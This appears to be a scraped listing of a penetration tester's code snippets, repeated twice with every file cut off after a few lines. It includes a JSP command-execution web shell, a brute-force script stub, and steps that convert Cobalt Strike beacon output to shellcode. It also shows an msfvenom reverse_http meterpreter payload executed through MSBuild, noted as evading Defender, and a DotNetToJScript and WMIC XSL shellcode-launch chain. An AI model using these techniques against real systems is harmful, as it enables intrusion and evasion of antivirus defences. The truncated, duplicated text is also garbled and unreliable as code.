0xhexmex

## james-admin-brute.py
#!/usr/bin/python

import socket
import sys
import os

host = 'TARGET IP ADDRESS HERE'
port = 4555

try:

## FindHTTPinNessus.ps1
# This script can be used to extract a list of HTTP servers from .nessus files.
# Original Author: Scott Sutherland, NetSPI 2017
# Modified by KM 11/2018 to extract a list of all HTTP servers, not just IIS6
# Instructions: Run the script in a directory containing only .nessus files. Super dirty/slow, but functional.

# Create an output table
$outputtbl =New-Object System.Data.DataTable
$outputtbl.Columns.Add("IpAddress") | Out-Null
$outputtbl.Columns.Add("WebServerVersion") | Out-Null

## install-drupal.sh
# Another gem from Joaquim Nogueira (@lkys37en)

#!/bin/bash
#Reference:https://www.valuebound.com/resources/blog/Installing-drupal-with-drush-the-basics
#Reference:https://websiteforstudents.com/install-drupal-cms-on-ubuntu-16-04-lts-with-apache2-mariadb-php-7-1-and-lets-encrypt-ssl-tls/

print_usage() {
  echo ""
  echo "Usage: $0 -v drupal-8.5.0 -p Welcome1"
  echo

## Get-KerberosKeytab.ps1
param(
    [Parameter(Mandatory)]
    [string]$Path
)

#Created by Pierre.Audonnet@microsoft.com
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
#  keytab {

## cmd.jsp
<form method="GET" action="">
	<input type="text" name="cmd" />
	<input type="submit" value="Exec!" />
</form> <%!
public String esc(String str){
	StringBuffer sb = new StringBuffer();
	for(char c : str.toCharArray())
		if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' )
			sb.append( c );
		else

## formatting.txt
// Take a stageless CS Beacon raw payload and convert to shellcode in the '\xAA\xBB...' format

# Attacks > Packages > Windows Executable (S) > Raw. Save as beacon.bin
# hexdump -v -e '"\\x" 1/1 "%02X"' ./beacon.bin


// Take any raw shellcode file and get the hex from it in the 'fe9820fa...' format

# xxd -p -c 100000000000000000 ./payload.bin

## msbuild-shellcode.xml
/* Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
Example to create a CS beacon stager, base64-encoded to insert into "strShellCode" variable below
msfvenom -p windows/meterpeter/reverse_http LHOST=1.1.1.1 LPORT=443 -f raw -o /tmp/payload.bin && base64 -w0 /tmp/payload.bin
Then execute this on target with "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe .\msbuild-shellcode.xml"
Defender doesn't flag on this (as of 5/30/19)
*/

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="[TARGETNAME]">
   <ClassExample />

## joindomain.sh
# Created by Joaquim Nogueira (@lkys37en), March 2019. I take no credit for this awesome work :)


#!/bin/bash
print_usage() {
  echo ""
  echo "A huge thank you to Brax from proslackers for helping me with this script, thank you!"
  echo ""
  echo "Usage: $0 -d lkylabs.com -u Administrator -p Welcome1! -o OU=Linux-Servers,OU=Servers,OU=Computers,OU=lkylabs,DC=lkylabs,DC=com -s 'lkylabs\\domain^admins lkylabs\\linux^admins' -x 'lkylabs\\domain^admins'"
  echo

## generic-shellcode-launcher.cs
// Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
// Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs
// Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs
//  Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll
//  mylauncher.js can be put into something like a WMIC XSL template like so...

/*
// wmic-template.xsl
// wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe)

## fixterm.sh
#!/bin/zsh


# Turn off auto suggestions
rm /usr/share/zsh-autosuggestions/zsh-autosuggestions.zsh

# Turn off syntax highlighting
rm /usr/share/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh

# Reload terminal
	#!/usr/bin/python

	import socket
	import sys
	import os

	host = 'TARGET IP ADDRESS HERE'
	port = 4555

	try:
	# This script can be used to extract a list of HTTP servers from .nessus files.
	# Original Author: Scott Sutherland, NetSPI 2017
	# Modified by KM 11/2018 to extract a list of all HTTP servers, not just IIS6
	# Instructions: Run the script in a directory containing only .nessus files. Super dirty/slow, but functional.

	# Create an output table
	$outputtbl =New-Object System.Data.DataTable
	$outputtbl.Columns.Add("IpAddress") \| Out-Null
	$outputtbl.Columns.Add("WebServerVersion") \| Out-Null
	# Another gem from Joaquim Nogueira (@lkys37en)

	#!/bin/bash
	#Reference:https://www.valuebound.com/resources/blog/Installing-drupal-with-drush-the-basics
	#Reference:https://websiteforstudents.com/install-drupal-cms-on-ubuntu-16-04-lts-with-apache2-mariadb-php-7-1-and-lets-encrypt-ssl-tls/

	print_usage() {
	echo ""
	echo "Usage: $0 -v drupal-8.5.0 -p Welcome1"
	echo
	param(
	[Parameter(Mandatory)]
	[string]$Path
	)

	#Created by Pierre.Audonnet@microsoft.com
	#
	#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
	#
	# keytab {
	<form method="GET" action="">
	<input type="text" name="cmd" />
	<input type="submit" value="Exec!" />
	</form> <%!
	public String esc(String str){
	StringBuffer sb = new StringBuffer();
	for(char c : str.toCharArray())
	if( c >= '0' && c <= '9' \|\| c >= 'A' && c <= 'Z' \|\| c >= 'a' && c <= 'z' \|\| c == ' ' )
	sb.append( c );
	else
	// Take a stageless CS Beacon raw payload and convert to shellcode in the '\xAA\xBB...' format

	# Attacks > Packages > Windows Executable (S) > Raw. Save as beacon.bin
	# hexdump -v -e '"\\x" 1/1 "%02X"' ./beacon.bin


	// Take any raw shellcode file and get the hex from it in the 'fe9820fa...' format

	# xxd -p -c 100000000000000000 ./payload.bin
	/* Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
	Example to create a CS beacon stager, base64-encoded to insert into "strShellCode" variable below
	msfvenom -p windows/meterpeter/reverse_http LHOST=1.1.1.1 LPORT=443 -f raw -o /tmp/payload.bin && base64 -w0 /tmp/payload.bin
	Then execute this on target with "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe .\msbuild-shellcode.xml"
	Defender doesn't flag on this (as of 5/30/19)
	*/

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="[TARGETNAME]">
	<ClassExample />
	# Created by Joaquim Nogueira (@lkys37en), March 2019. I take no credit for this awesome work :)


	#!/bin/bash
	print_usage() {
	echo ""
	echo "A huge thank you to Brax from proslackers for helping me with this script, thank you!"
	echo ""
	echo "Usage: $0 -d lkylabs.com -u Administrator -p Welcome1! -o OU=Linux-Servers,OU=Servers,OU=Computers,OU=lkylabs,DC=lkylabs,DC=com -s 'lkylabs\\domain^admins lkylabs\\linux^admins' -x 'lkylabs\\domain^admins'"
	echo
	// Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
	// Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs
	// Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs
	// Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll
	// mylauncher.js can be put into something like a WMIC XSL template like so...

	/*
	// wmic-template.xsl
	// wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe)
	#!/bin/zsh


	# Turn off auto suggestions
	rm /usr/share/zsh-autosuggestions/zsh-autosuggestions.zsh

	# Turn off syntax highlighting
	rm /usr/share/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh

	# Reload terminal